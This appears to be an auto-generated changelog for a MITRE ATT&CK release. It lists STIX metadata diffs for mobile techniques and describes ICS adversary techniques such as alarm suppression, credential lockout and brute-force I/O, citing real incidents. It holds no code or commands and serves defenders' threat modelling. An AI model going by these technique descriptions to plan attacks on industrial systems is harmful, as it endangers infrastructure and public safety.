STIX Field | Old value | New Value
modified | 2022-04-06 15:52:07.711000+00:00 | 2023-03-20 18:53:34.118000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1644] Out of Band Data

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-29 17:29:15.978000+00:00 | 2023-03-20 18:53:59.025000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1629.001] Impair Defenses: Prevent Application Removal

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:59:01.549000+00:00 | 2023-03-20 18:54:36.502000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1424] Process Discovery

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-03-30 20:32:19.942000+00:00 | 2023-03-20 18:55:23.702000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1631] Process Injection

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 17:05:09.653000+00:00 | 2023-03-20 18:55:54.442000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1636] Protected User Data

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 19:31:34.018000+00:00 | 2023-03-20 18:56:20.270000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1604] Proxy Through Victim

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-20 18:57:14.285000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1631.001] Process Injection: Ptrace System Calls

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 17:05:37.431000+00:00 | 2023-03-20 18:57:40.571000+00:00
external_references[1]['source_name'] | PTRACE man | BH Linux Inject
external_references[1]['description'] | Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020. | Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.
external_references[1]['url'] | http://man7.org/linux/man-pages/man2/ptrace.2.html | https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf
external_references[3]['source_name'] | BH Linux Inject | PTRACE man
external_references[3]['description'] | Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020. | Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.
external_references[3]['url'] | https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf | http://man7.org/linux/man-pages/man2/ptrace.2.html
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1430.001] Location Tracking: Remote Device Management Services

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21 13:44:31.305000+00:00 | 2023-03-20 18:58:20.113000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1582] SMS Control

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
external_references | | Google. (n.d.). SmsProvider.java. Retrieved September 11, 2020.
external_references | | S.Main, D. Braun. (2013, October 14). Getting Your SMS Apps Ready for KitKat. Retrieved September 11, 2020.
external_references | | APP-16
external_references | | CEL-41
dictionary_item_removed
STIX Field | Old value | New Value
external_references | APP-16 | 
external_references | CEL-41 | 
external_references | S.Main, D. Braun. (2013, October 14). Getting Your SMS Apps Ready for KitKat. Retrieved September 11, 2020. | 
external_references | Google. (n.d.). SmsProvider.java. Retrieved September 11, 2020. | 
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-20 18:58:57.001000+00:00
external_references[1]['source_name'] | NIST Mobile Threat Catalogue | Android SmsProvider
external_references[1]['url'] | https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html | https://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/7e7c274/src/com/android/providers/telephony/SmsProvider.java
external_references[2]['source_name'] | NIST Mobile Threat Catalogue | SMS KitKat
external_references[2]['url'] | https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html | https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html
external_references[3]['source_name'] | SMS KitKat | NIST Mobile Threat Catalogue
external_references[3]['url'] | https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html | https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html
external_references[4]['source_name'] | Android SmsProvider | NIST Mobile Threat Catalogue
external_references[4]['url'] | https://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/7e7c274/src/com/android/providers/telephony/SmsProvider.java | https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1636.004] Protected User Data: SMS Messages

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-11 19:40:28.979000+00:00 → 2023-03-20 18:58:33.873000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1513] Screen Capture

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-01 13:31:00.559000+00:00 → 2023-03-20 18:57:43.022000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.2 → 1.3

[T1418.001] Software Discovery: Security Software Discovery

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-11 19:17:09.165000+00:00 → 2023-03-20 18:55:33.642000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1418] Software Discovery

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-03-30 20:41:40.719000+00:00 → 2023-03-20 18:55:03.477000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

[T1406.002] Obfuscated Files or Information: Software Packing

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-21 17:32:15.993000+00:00 → 2023-03-20 18:54:40.501000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1635] Steal Application Access Token

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-05 17:11:24.641000+00:00 → 2023-03-20 18:53:52.292000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1409] Stored Application Data

Current version: 3.1

Version changed from: 3.0 → 3.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-11 19:41:54.022000+00:00 → 2023-03-20 18:53:16.029000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.0 → 3.1

[T1632] Subvert Trust Controls

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-08 15:47:12.903000+00:00 → 2023-03-20 18:52:52.097000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1474] Supply Chain Compromise

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-03-28 19:41:56.018000+00:00 → 2023-03-20 18:52:29.947000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

[T1628.001] Hide Artifacts: Suppress Application Icon

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-05-20 17:16:08.997000+00:00 → 2023-03-20 18:51:29.931000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1633.001] Virtualization/Sandbox Evasion: System Checks

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-21 17:34:12.113000+00:00 → 2023-03-20 18:51:04.432000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1422] System Network Configuration Discovery

Current version: 2.3

Version changed from: 2.2 → 2.3

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-03-30 21:04:12.723000+00:00 → 2023-03-20 18:50:32.697000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.2 → 2.3

[T1625.001] Hijack Execution Flow: System Runtime API Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-05 16:52:49.037000+00:00 → 2023-03-20 18:46:08.412000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1641.001] Data Manipulation: Transmitted Data Manipulation

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-21 17:34:52.311000+00:00 → 2023-03-20 18:44:26.748000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1635.001] Steal Application Access Token: URI Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-06 12:44:03.799000+00:00 → 2023-03-20 18:43:49.443000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1630.001] Indicator Removal on Host: Uninstall Malicious Application

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-21 17:33:44.504000+00:00 → 2023-03-20 18:43:03.218000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1623.001] Command and Scripting Interpreter: Unix Shell

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-05 16:45:47.619000+00:00 → 2023-03-20 18:41:18.389000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1512] Video Capture

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-08 15:58:43.813000+00:00 → 2023-03-20 18:38:27.848000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

[T1633] Virtualization/Sandbox Evasion

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-08 15:47:37.920000+00:00 → 2023-03-20 18:37:57.884000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[T1481] Web Service

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-06 15:35:05.775000+00:00 → 2023-03-20 18:37:13.730000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.1 → 1.2

ics-attack

New Techniques

[T0892] Change Credential

Current version: 1.0

Description: Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces. An adversary with access to valid or hardcoded credentials could change the credential to prevent future authorized device access. Change Credential may be especially damaging when paired with other techniques such as Modify Program, Data Destruction, or Modify Controller Tasking. In these cases, a device’s configuration may be destroyed or include malicious actions for the process environment, which cannot be removed through normal device configuration actions. Additionally, recovery of the device and original configuration may be difficult depending on the features provided by the device. In some cases, these passwords cannot be removed onsite and may require that the device be sent back to the vendor for additional recovery steps. A chain of incidents occurred in Germany, where adversaries locked operators out of their building automation system (BAS) controllers by enabling a previously unset BCU key. (Citation: German BAS Lockout Dec 2021)


[T0893] Data from Local System

Current version: 1.0

Description: Adversaries may target and collect data from local system sources, such as file systems, configuration files, or local databases. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Adversaries may do this using [Command-Line Interface](https://attack.mitre.org/techniques/T0807) or [Scripting](https://attack.mitre.org/techniques/T0853) techniques to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T0802) on the local system.

Minor Version Changes

[T0878] Alarm Suppression

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.

A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question:

* An alarm raised by a protocol message
* An alarm signaled with I/O
* An alarm bit set in a flag (and read)

In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019)

Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.

In the Maroochy Shire attack, the adversary suppressed alarm reporting to the central computer.(Citation: Marshall Abrams July 2008)

New Description

Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.

A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question:

* An alarm raised by a protocol message
* An alarm signaled with I/O
* An alarm bit set in a flag (and read)

In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019)

Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.
Details
values_changed (STIX Field: Old value → New value)
modified: 2022-10-20 18:15:39.012000+00:00 → 2023-03-30 20:13:55.599000+00:00
description (old value): Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: * An alarm raised by a protocol message * An alarm signaled with I/O * An alarm bit set in a flag (and read) In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code. In the Maroochy Shire attack, the adversary suppressed alarm reporting to the central computer.(Citation: Marshall Abrams July 2008)
description (new value): Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: * An alarm raised by a protocol message * An alarm signaled with I/O * An alarm bit set in a flag (and read) In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[2]: Operational Databases: Process/Event Alarm → Operational Databases: Process History/Live Data
x_mitre_version: 1.1 → 1.2
iterable_item_added (STIX Field: New value)
x_mitre_data_sources: Operational Databases: Process/Event Alarm
iterable_item_removed (STIX Field: Old value)
external_references: {'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}
x_mitre_data_sources: Operational Databases: Process History/Live Data

[T0806] Brute Force I/O

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description

Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversarys goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point.

Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.

New Description

Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point.

Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.
Details
values_changed (STIX Field: Old value → New value)
modified: 2022-09-20 19:28:07.225000+00:00 → 2023-03-29 16:17:27.903000+00:00
description (old value): Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversarys goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.
description (new value): Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. Adversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Operational Databases: Process History/Live Data → Application Log: Application Log Content
x_mitre_data_sources[2]: Application Log: Application Log Content → Operational Databases: Process History/Live Data
x_mitre_version: 1.0 → 1.1

[T0879] Damage to Property

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description

Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828).

In the Maroochy Shire attack, the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community's now blackened rivers.(Citation: Marshall Abrams July 2008)

The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace.

A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)

New Description

Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828).

The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace.

A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)
Details
values_changed (STIX Field: Old value → New value)
modified: 2022-10-20 18:12:38.570000+00:00 → 2023-03-30 20:14:42.829000+00:00
description (old value): Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). In the Maroochy Shire attack, the adversary gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community's now blackened rivers.(Citation: Marshall Abrams July 2008) The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)
description (new value): Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)
kill_chain_phases[0]['phase_name']: impact-ics → impact
external_references[4]['source_name']: Marshall Abrams July 2008 → Shelley Smith February 2008
external_references[4]['description']: Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 → Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17
external_references[4]['url']: https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf → https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1
iterable_item_removed (STIX Field: Old value)
external_references: {'source_name': 'Shelley Smith February 2008', 'description': 'Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ', 'url': 'https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/'}

[T0811] Data from Information Repositories

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases or local machines in the process environment, as well as workstations and databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)

Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.

In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)

New Description

Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)

Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.

In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)

Dropped Detections:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 18:05:21.731000+00:00 | 2023-03-30 19:09:43.744000+00:00
description | Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases or local machines in the process environment, as well as workstations and databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018) Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS. In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021) | Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018) Information collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS. In a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)
kill_chain_phases[0]['phase_name'] | collection-ics | collection
